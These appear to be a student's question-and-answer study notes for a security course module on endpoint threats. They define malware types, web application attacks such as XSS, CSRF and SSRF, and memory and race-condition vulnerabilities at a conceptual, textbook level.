Module 3 - Threats & Attacks on Endpoints

Question 1

What word is currently accepted when referring to network-connected hardware devices?

Answer 1

endpoint

this term reflects the fact that devices that are connected to a network today are far more than a computing device with a keyboard and monitor

Question 2

What are the five groupings used to characterize malware?

Answer 2

imprison - ex: ransomware, cryptomalware

launch - ex: virus, worm, bot

snoop - ex: spyware, keylogger

deceive - ex: PUPs, trojan, RAT

evade - ex: backdoor, logic bomb, rootkit

Question 3

Gabriel’s sister called him about a message that suddenly appeared on her screen that says her software license has expired and she must immediately pay $500 to have it renewed before control of her computer is returned to her. What type of malware has infected her computer?

Answer 3

blocking ransomware

this is one of the earliest forms of malware

Question 4

Marius’s team leader has just texted him that an employee has just reported that her computer is sudden locked up with cryptomalware. Why would Marius consider this a dangerous situation?

Answer 4

cryptomalware can encrypt all files on any network that is connected to the employee’s computer

basically any other endpoint that is connected to the network that the infected computer is connected to is vulnerable

Question 5

Which type of malware relies on LOLBins?

Answer 5

file-less virus

a file-less virus does not attach itself to a file like a file virus would; a file-less virus takes advantage of native services and processes that are part of the OS to avoid detection and carry out its attacks; the native services used in a file-less virus are called living-off-the-land binaries

Question 6

Which type of malware is known as a network virus?

Answer 6

a worm

a worm is a malicious program that uses a computer network to replicate; it is designed to enter a computer through the network and then take advantage of a vulnerability in an application or an OS on the host computer; once the worm has exploited the vulnerability on one system, it immediately searches for another computer on the network that has the same vulnerability

Question 7

What are some examples of different attacks generated through a botnet?

Answer 7

spamming
spreading malware
ad fraud
mining cryptocurrencies
DDOS
DOS

Question 8

What are some ways a bot communicates with a C & C device?

Answer 8

1) by signing into a bot-herding website where information has been placed that the bot knows how to interpret
2) by signing in to a 3rd party website
3) commands sent via blog posts, specially coded attack commands through twitter posts or notes posted on Facebook
4) by creating an email account and then drafting an email that is never sent but contains commands the bot receives when it logs into the email account and reads the draft

Question 9

Randall’s roommate is complaining to him about all of the software that came pre-installed on his new computer. What type of software is this?

Answer 9

PUP (Potentially Unwanted Programs)

Question 10

What is the difference between a Trojan and Remote Access Trojan (RAT)?

Answer 10

a RAT gives the attacker unauthorized remote access to the victim’s computer

a computer Trojan is an executable program that masquerades as performing a benign activity but also does something malicious; ex) a user might download what is advertised as a calendar program yet in addition to installing the calendar, ti also installs malware that scans the system for credit card numbers and passwords, connects through the network to remote system and then transmits that information to the attacker

a remote access Trojan has the basic functionality of a Trojan but also gives the threat actor unauthorized remote access to the victim’s computer by using specially configured communication protocols

Question 11

Which of these would NOT be considered the result of a logic bomb?

a) send an email to Rowan’s inbox each Monday morning with the agenda of that week’s department meeting
b) if the company’s stock price drops below $50, then credit Oscar’s retirement account with one additional year of retirement credit
c) erase the hard drives of all the servers 90 days after Alfredo’s name is removed form the list of current employees
d) delete all human resource records regarding Augustine one month after he leaves the company

Answer 11

A) send an email to Rowan’s inbox each Monday morning with the agenda of that week’s department meeting

Question 12

Which of the following attacks is based on a website accepting user input without sanitizing it?

a) RSS
b) XSS
c) SQLS
d) SSXRS

Answer 12

B) XSS - cross site scripting attack

Question 13

Which of the following attacks is based on the principle that when a user is currently authenticated on a website and then loads a another webpage, the new page inherits the identity and privileges of the first website?

a) SSFR
b) DLLS
c) CSRF
d) DRCR

Answer 13

C) CSRF - cross-site request forgery attack

Question 14

Which of the following manipulates the trusting relationship between web servers?

a) SSRF
b) CSRF
c) EXMAL
d) SCSI

Answer 14

A) SSRF - server-side request forgery attack

Question 15

Which type of memory vulnerability attack manipulates the “return address” of the memory location of software program?

a) shim overflow attack
b) factor overflow attack
c) integer overflow attack
d) buffer overflow attack

Answer 15

D) buffer overflow attack

Question 16

What race condition can result in a NULL pointer/object dereference?

a) conflict race condition
b) value-based race condition
c) threat race condition
d) time of check/time of use race condition

Answer 16

D) time of check/time of use race condition

Question 17

Which of the following attacks targets the external software component that is a repository of both code and data?

a) application program interface (API) attack
b) device driver manipulation attack
c) dynamic-link library (DLL) injection attack
d) OS REG attack

Answer 17

C) dynamic-link library (DLL) injection attack

Question 18

What term refers to changing the design of existing code?

a) library manipulation
b) shimming
c) refactoring
d) design driver manipulation

Answer 18

C) refactoring

Question 19

Which of the following is technology that imitates human abilities?

a) AI
b) ML
c) RC
d) XLS

Answer 19

A) artificial intelligence (AI)

Question 20

Which statement regarding keylogger is NOT true?

a) software keyloggers can be designed to send captured information automatically back to the attacker through the internet
b) hardware keyloggers are installed between the keyboard and computer keyboard USB port
c) software keyloggers are generally easy to detect
d) keyloggers can be used to capture passwords , credit card numbers, or personal information

Answer 20

C) software keyloggers are generally easy to detect

Question 21

What are some examples of malware used to “imprison” a user/system?

Answer 21

1) ransomware - is one the fastest growing types of malware; ransomware prevents a user’s endpoint device from properly and fully functioning until a fee is paid; that is, it takes away a user’s freedom from freely using their computer until the ransom is transacted
2) cryptomalware - a more recent form of malware that instead of blocking users from accessing the computer, the malware encrypts all the files on the device so that none of them can be opened; new variants of cryptomalware can encrypt all files on any network or attached device connected to the infected computer

Question 22

What are some examples of malware used to “launch” attacks on other computers/systems?

Answer 22

File-based virus - it is malicious computer code that is attaches itself to a file; a file-based virus reproduces itself on the same computer without any human intervention; each time the infected program is launched or the data file is opened - either by the user or the computer’s operating system (OS) - the virus first unloads a payload to perform a malicious action, then the virus reproduces itself by inserting its code into another file, but only on the same computer; a file-based virus can only be transmitted when a user transfers the infected file to other devices

File-less virus - does not attach itself to a file on a computer, instead takes advantage of native services and processes that are part of the OS to avoid detection and carry out its attacks; these native services used in a file-less virus are called living-off-the-land binaries (LOLBins); unlike a file-based virus, a file-less virus does not infect a file and wait for that file to be launched; instead, the malicious code of a fileless virus is loaded directly in the computer’s random access memory (RAM) through the LOLBins and then executed; advantages of file-less virus over a file-based virus is

1) easy to infect - does not require certain file types in order to infect a computer stored on a hard drive but instead a common delivery method is through malicious webpages that the user visits; these pages silently send a script to the victim’s web browser which invokes a scripting language such as JaveScript; the browser passes instructions to a LOLBin such as PowerShell, which reads and executes the commands
2) extensive control - several LOLBins have extensive control and authority on a computer; ex) PowerShell has full access to the core OS of a Windows computer, so it can undermine existing security features; PowerShell can also manipulate user accounts and password protection
3) persistent - a program that is loaded into RAM for execution will terminate once the computer is shut down or rebooted, however, file-less viruses often write their script into the Windows Registry, which is a database that stores settings for the Windows OS and application programs; each time the computer is restarted or on a set schedule, the script of the file-less virus is again launched
4) difficult to detect - files that are infected virus loads into RAM, no telltale file can be scanned
5) difficult to defend against - to fully defend against a file-less virus, ti would be necessary to turn off all the potential LOLBins, which would cripple the OS and cause it to not properly function

Worm
a worm is a malicious program that uses a computer network to replicate; a worm is designed to enter a computer through the network and then take advantage of a vulnerability in an application or an OS on the host computer; once the worm has exploited the vulnerability on one system, it immediately searches for another computer on the network that has the same vulnerability; also known as a network virus

Bot
software that allows the infected computer to be placed under the remote control of an attacker for the purpose of launching attacks; this infected robot computer is known as a bot or zombie; infected bot computers receive instructions through a command and control (C&C) structure from the bot herder(s) regarding which computers to attack and how

Question 23

What are some examples of malware used to “snoop” on a user/system?

Answer 23

Spyware - spyware is tracking software that is deployed without consent or control of the user; sypware can secretly monitor users by collecting information without their approval through the computer’s resources, including programs already installed on the computer, to collect and distribute personal or sensitive information

Keylogger - can be a software program or hardware device that silently captures and stores each keystroke that user types on the computer’s keyboard; software keyloggers can go beyond just capturing keystrokes, they can also capture everything on the user’s screen and silently turn on the computer’s web camera to record images of the user; the advantage of software keyloggers to hardware keylogger is that the threat actor does not have to physically access the user’s computer because they can be installed remotely and then routinely send captured information back to the threat actor through the victim’s own internet connection

Question 24

What are some examples of malware used to “deceive” a user/system?

Answer 24

Potentially Unwanted Programs (PUPs) - is software that the user does not want on their computer; PUPs often become installed along with other programs and are the result of the user overlooking the default installation options on software downloads; PUPs may include software that comes preloaded on a new computer or smartphone and cannot be easily removed (if at all); other forms of PUPs are: pop-up windows, pop-under windows, search engine hijacking, home page hijacking, toolbars with no value for the user, and settings that redirect to competitor’s websites, alter search results, and replace ads on webpages

Trojan - a computer Trojan is an executable program that masquerades as performing a benign activity but also does something malicious

Remote Access Trojan (RAT) - is a special type of Trojan that has the same basic functionality of a Trojan but also gives the threat actor unauthorized access to the victim’s computer by using specially configured communication protocols; this creates an opening into the victim’s computer, allowing the threat agent unrestricted access

Question 25

What are some examples of malware used to “evade” a user/system?

Answer 25

backdoor - gives access to a computer, program, or service that circumvents any normal security protections; backdoors installed on a computer allow an attacker to return later and bypass security settings

logic bomb - is computer code that is typically added to legitimate program but lies dormant and evades detection until a specific logical event triggers it; once the logic bomb is triggered it performs its intended malicious action

rootkits - is malware that can hides its presence and the presence of other malware on the computer; it does this by accessing “lower layers” of the operating system even using undocumented functions to make alterations; this enables the rootkit and any accompanying software to become undetectable by the operating system and common anti-malware scanning software that is designed to seek and find malware

Question 26

What are some risks associated with using artificial intelligence and machine learning in cybersecurity?

Answer 26

known as adversarial artificial intelligence which is defined as exploiting the risks associated with artificial intelligence and machine learning; the first risk is the security of the machine learning algorithm; just as all hardware and software is subject to being infiltrated by threat actors, AI-powered cybersecurity applications and their devices likewise have vulnerabilities; these could be attacked and compromised, allowing threat actors to alter algorithms to ignore attacks, much like a rootkit can instruct an OS to ignore malicious actions

another risk is tainted training data for machine learning; attackers can attempt to alter the training data that is used by machine learning in order to produce false negatives to cloak themselves

Question 27

What is a cross-site scripting (XSS) attack?

Answer 27

is an application attack where a website that accepts user input without validating it (called sanitizing) and uses that input in a response that can be exploited

Question 28

What are some examples of “injection” application attacks?

Answer 28

SQL injection - one of the most common injection attacks, this attack inserts statements to manipulate a database server; SQL stands for ‘Structure Query Language’, a language used to view and manipulate data that is stored in a relational database

XML injection - XML stands for ‘extensible markup language and is a popular type of NoSQL database; uses the same principles of a SQL injection but instead does not target SQL servers but rather NoSQL servers;

these attacks can be thwarted as long as the input is being properly sanitized

Question 29

What are some examples of “request forgery” application attacks?

Answer 29

cross-site request forgery (CSRF) - takes advantage of an authentication “token” that a website sends to a user’s web browser; if the user is currently authenticated on a website and is then tricked into loading another webpage, the new page inherits the identity and privileges of the victim, who may then perform an undesired function on the attacker’s behalf; because this type of request forgery takes place on the client side it is sometimes referred to as a client-side request forgery

server-side request forgery (SSRF) - takes advantage of a trusting relationship between web servers (as opposed to a CSRF, which manipulates the trust from a user’s web browser to a server); a SSRF attack exploits how a web server processes external information received from another server; some web applications are designed to read information from or write information to a specific URL and if an attacker can modify that target URL, they can potentially extract sensitive information from the application or inject untrusted input into it

Question 30

How does a replay attack work?

Answer 30

a replay attack copies data and then uses it for an attack; replay attacks are commonly used against digital identities – after intercepting and copying data, the threat actor re-transmits selected and edited portions of the copied communications later to impersonate the legitimate user; many digital identity replay attacks are between a user and an authentication server

Question 31

What are some examples of application attacks that exploit memory vulnerabilities?

Answer 31

these types of attacks are directed at vulnerabilities with how a program uses RAM; these are often the result of poor techniques (or laziness) by the software developer; some memory-related attacks are called resource exhaustion attacks because they “deplete” parts of memory and thus interfere with the normal operation of the program in RAM

memory leak - when a program is running it normally dynamically allocates memory but due to a programming error, it may not free that memory when finished using it; an attacker can then take advantage of the unexpected program behavior resulting from a low memory condition

buffer overflow attack - occurs when a process attempts to store data in RAM beyond the boundaries of a fixed-length storage buffer; this extra data overflows into the adjacent memory locations (a buffer overflow); because the storage buffer typically contains the “return address” memory location of the software program being executed when another function interrupted the process, an attacker can overflow the buffer with a new address pointing to the attacker’s malware code

integer overflow attack - on a computer an integer overflow is the condition that occurs when the result of an arithmetic operation – such as addition or multiplication – exceeds the maximum size of the integer type used to store it; when this integer overflow occurs, the interpreted value then wraps around from the maximum value to the minimum value; in an integer overflow attack an attacker changes the value of a variable to something outside the range that the programmer had intended by using an integer overflow

Question 32

What are some examples of application attacks that exploit improper exception handling vulnerabilities?

Answer 32

improper input handling - software that allows the user to enter data but does not filter or validate the user input thus allowing for a malicious action to occur; ex) a webpage on a web server with improper input handling that asks for the user’s email address could allow an attacker to instead enter a direct command that the server would then execute

error handling - occurs when software does not properly trap an error condition and thus provides an attacker with underlying access to the computer/system; ex) an attacker enters a string of characters that is much longer than expected; because the software has not been designed to handle this type of event, the program could crash or suddenly halt its execution and then display an underlying OS prompt, giving an attacker access to the computer

NULL pointer/object dereference - (a dereference obtains from a pointer the address of a data item held in another location) when an application dereferences a pointer that it expects to be valid but instead has a value of NULL, it typically will cause a program to crash or exit; a NULL pointer object dereference can occur through a number of flaws, including simple programming omissions

race condition - a NULL pointer/object dereference can also result in a race condition; a race condition in software occurs when two concurrent threads of execution access a shared resource simultaneously, resulting in unintended consequences; ex) in a program with two threads that have access to the same location in memory, Threat #1 stores the value A in that memory location, but since since Thread #2 is also executing, it may overwrite the same memory location with the value Z; when Thread #1 retrieves the value stored, it is given Thread #2’s value of Z instead of its own A; the software checks the state of a resource before using that resource, but the resource’s state can change between the check and the use in a way that invalidates the results of the check <– this is called a time of check/time of use race condition

Question 33

What are some examples of application attacks that exploit external software component vulnerabilities?

Answer 33

application program interface (API) attack - an API is a link provided by an OS, web browser, or other platform that allows a developer access to resources at a high level; because APIs provide direct access to data and an entry point to an application’s functions the are attractive targets for attackers looking for a way in

device driver manipulation - a device driver is software that controls and operates external hardware device that is connected to a computer; device drivers are specific to both the OS and the hardware device; an attacker may use shimming which is transparently adding a small coding library that intercepts calls made by the device and the device driver; this refactoring (changing the design of existing code) can be difficult to detect yet serves as a real threat

Dynamic-link Library (DLL) injection - technique used by attackers for inserting code into a running process through a DLL to cause a program to function in a different way than intended; a dynamic-link library is a repository of both code and data than can be used by more than one program at the same time